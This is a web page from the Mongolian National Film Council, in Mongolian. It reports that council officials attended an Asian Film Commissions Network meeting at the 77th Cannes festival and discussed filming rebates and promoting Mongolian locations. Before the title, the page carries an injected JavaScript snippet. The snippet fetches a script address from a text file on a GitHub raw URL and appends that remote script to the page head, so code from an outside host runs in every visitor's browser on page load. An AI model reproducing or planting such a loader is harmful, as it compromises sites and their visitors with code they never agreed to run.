;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); АЗИЙН КИНО ХОРООДЫН СҮЛЖЭЭНИЙ УУЛЗАЛТАД ОРОЛЦЛОО - Mongolian National Film Council

АЗИЙН КИНО ХОРООДЫН СҮЛЖЭЭНИЙ УУЛЗАЛТАД ОРОЛЦЛОО

АЗИЙН КИНО ХОРООДЫН СҮЛЖЭЭНИЙ УУЛЗАЛТАД ОРОЛЦЛОО
АЗИЙН КИНО ХОРООДЫН СҮЛЖЭЭНИЙ УУЛЗАЛТАД ОРОЛЦЛОО
77 дахь удаагийн Каннын Олон Улсын кино наадмын үеэр Азийн кино хороодын сүлжээний (Asian Film Commissions Network) гишүүн орнуудын уулзалт 5 дугаар 19-ны өдөр амжилттай болж өндөрлөлөө.
Энэхүү уулзалтад Кино урлагийн зөвлөл бөгөөд ажлын албаны дарга Ч.Ундрал болон Кино урлагийн зөвлөлийн гишүүн Т.Номуунзул нар оролцов. Уулзалтаар Азийн кино хороодын сүлжээний гишүүн орнуудад Монгол Улсын нутаг дэвсгэрт зураг авалт хийхэд олгох буцаан олголт болон Монгол орны онцгой байршлуудыг сурталчлах, мэдээлэл хүргүүлж, түгээх талаар ярилцаж тохиролцлоо.
Азийн Кино Хороодын Сүлжээ (Asian Film Commissions Network) нь Ази дахь кино хороо болон мэргэжлийн кино агентлагуудыг дэмжих зорилготой бөгөөд Азид хамгийн томд тооцогдох, ашгийн бус олон улсын кино холбоо юм. Энэхүү Азийн кино хороодын сүлжээнд Монгол Улсын Соёлын яамны харьяа Кино урлагийн зөвлөл нь 2024 оны 03 дугаар сард 27-нд албан ёсоор элсэн орсон билээ.